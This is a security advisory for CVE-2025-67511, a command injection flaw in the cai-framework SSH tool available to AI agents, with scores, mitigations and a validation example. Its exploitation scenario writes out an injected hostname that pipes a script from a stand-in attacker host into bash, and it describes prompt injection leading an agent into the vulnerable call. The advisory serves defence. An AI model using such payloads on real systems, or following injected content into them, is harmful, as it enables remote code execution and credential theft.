CVE-2025-67511: cai-framework: Command Injection enables RCE

GHSA-4c65-9gqf-4w8h CRITICAL PoC AVAILABLE CISA: ATTEND
Published December 11, 2025
CISO Take

If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.

Risk Assessment

CVSS 9.6 Critical with network attack vector, zero privileges required, and low complexity makes this highly exploitable against any exposed CAI agent instance. The absence of a patch compounds the risk. Mitigating factor: EPSS 0.00158 indicates low current exploitation in the wild, and exploitation requires user interaction or agent invocation. However, the target is a security automation framework — compromise of a defensive security tool has amplified blast radius, as these systems typically hold credentials and have privileged access to production infrastructure.

Affected Systems

Package           Ecosystem   Vulnerable Range   Patched
cai-framework     pip         <= 0.5.9           No patch
cybersecurity_ai                                 No patch

Severity & Risk

CVSS 3.1
9.6 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 29% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector)         Network
AC (Attack Complexity)     Low
PR (Privileges Required)   None
UI (User Interaction)      Required
S  (Scope)                 Changed
C  (Confidentiality)       High
I  (Integrity)             High
A  (Availability)          High

Recommended Action

5 steps
  1. IMMEDIATE

    Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework.

  2. WORKAROUND

    Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level.

  3. PATCH

    Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged.

  4. DETECTION

    Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework.

  5. CONTAINMENT

    Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).
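The WORKAROUND and DETECTION steps above, worked through as an added example that is not CAI's own code: an allowlisting wrapper that validates username, host and port and hands ssh an argv list so no local shell parses them, plus a check that flags shell metacharacters in logged SSH parameters. The function names and the log-line format are assumptions; the sample log lines are constructed.

```python
import ipaddress
import re

# Allowlists from the WORKAROUND step: alphanumeric username, IP/FQDN host, port 1-65535.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_-]{0,31}$")
FQDN_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
FQDN_RE = re.compile(rf"^(?=.{{1,253}}$){FQDN_LABEL}(\.{FQDN_LABEL})*$")
# Metacharacters named in the DETECTION step, plus quoting and redirection characters.
SHELL_META = set(";|&$`<>(){}\n'\"\\")

# Constructed sample log lines in a hypothetical format (not CAI's real log layout).
SAMPLE_LOG = [
    "2025-12-11T10:00:01Z tool=ssh username=ops host=10.0.0.5 port=22",
    "2025-12-11T10:00:02Z tool=ssh username=ops host=scan-target.example;ls port=22",
]

def ssh_param_error(username, host, port):
    """Return a reason string if any value is off-allowlist, else None."""
    if not USERNAME_RE.fullmatch(str(username)):
        return f"invalid username: {username!r}"
    try:
        ipaddress.ip_address(str(host))  # IPv4/IPv6 literal is fine
    except ValueError:
        if not FQDN_RE.fullmatch(str(host)):
            return f"invalid host: {host!r}"
    try:
        port_num = int(str(port), 10)  # base 10 only: '0x16', '22;id', '22.0' all fail
    except ValueError:
        return f"invalid port: {port!r}"
    if not 1 <= port_num <= 65535:
        return f"port out of range: {port!r}"
    return None

def build_ssh_argv(username, host, port, command):
    """argv for subprocess.run(argv, shell=False): no local shell ever parses these values.
    The allowlists also forbid a leading '-', so no value can be parsed as an ssh option."""
    error = ssh_param_error(username, host, port)
    if error:
        raise ValueError(error)
    return ["ssh", "-p", str(int(str(port), 10)), f"{username}@{host}", command]

def suspicious_ssh_params(log_lines):
    """(line_no, field, value) for logged username/host/port values holding metacharacters."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        for field, value in re.findall(r"\b(username|host|port)=(\S+)", line):
            if SHELL_META & set(value):
                hits.append((n, field, value))
    return hits
```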

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
  Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
  8.4 - AI system operation and monitoring
  A.9.3 - AI System Security Testing
NIST AI RMF
  GOVERN-1.7 - Processes for decommissioning and oversight of AI systems
  GV-6.2 - AI System Security Practices
  MANAGE-2.4 - Residual risks are managed
  MS-2.5 - Risks from Third-Party AI Software and Dependencies
OWASP LLM Top 10
  LLM01 - Prompt Injection
  LLM06 - Excessive Agency
  LLM07 - Insecure Plugin Design
  LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-67511?

See the CISO Take section above.

Is CVE-2025-67511 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-67511, increasing the risk of exploitation.

How to fix CVE-2025-67511?

See the five-step Recommended Action section above.

What systems are affected by CVE-2025-67511?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, security automation pipelines, AI-driven offensive security tools, CI/CD with AI-assisted testing.

What is the CVSS score for CVE-2025-67511?

CVE-2025-67511 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.11%.

Technical Details

NVD Description

Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only the password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection, while the username, host and port values are injectable. This issue does not have a fix at the time of publication.

Exploitation Scenario

An adversary conducting a penetration test or red team engagement using CAI >= 0.5.9 targets a security operations team also running CAI.

  1. Attacker crafts a malicious target hostname — e.g., 'victim.com; curl attacker.com/shell.sh | bash' — and delivers it through a channel the victim's CAI agent will process (phishing lure, poisoned scan target list, or indirect prompt injection via agent context).

  2. The CAI agent invokes run_ssh_command_with_credentials() with the attacker-controlled host value.

  3. Because host is not sanitized, the shell executes both the SSH command and the injected payload.

  4. Attacker achieves RCE on the machine running the security team's AI agent, potentially inheriting all stored SSH credentials and access to internal networks the agent was managing.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published
December 11, 2025
Last Modified
March 17, 2026
First Seen
December 11, 2025
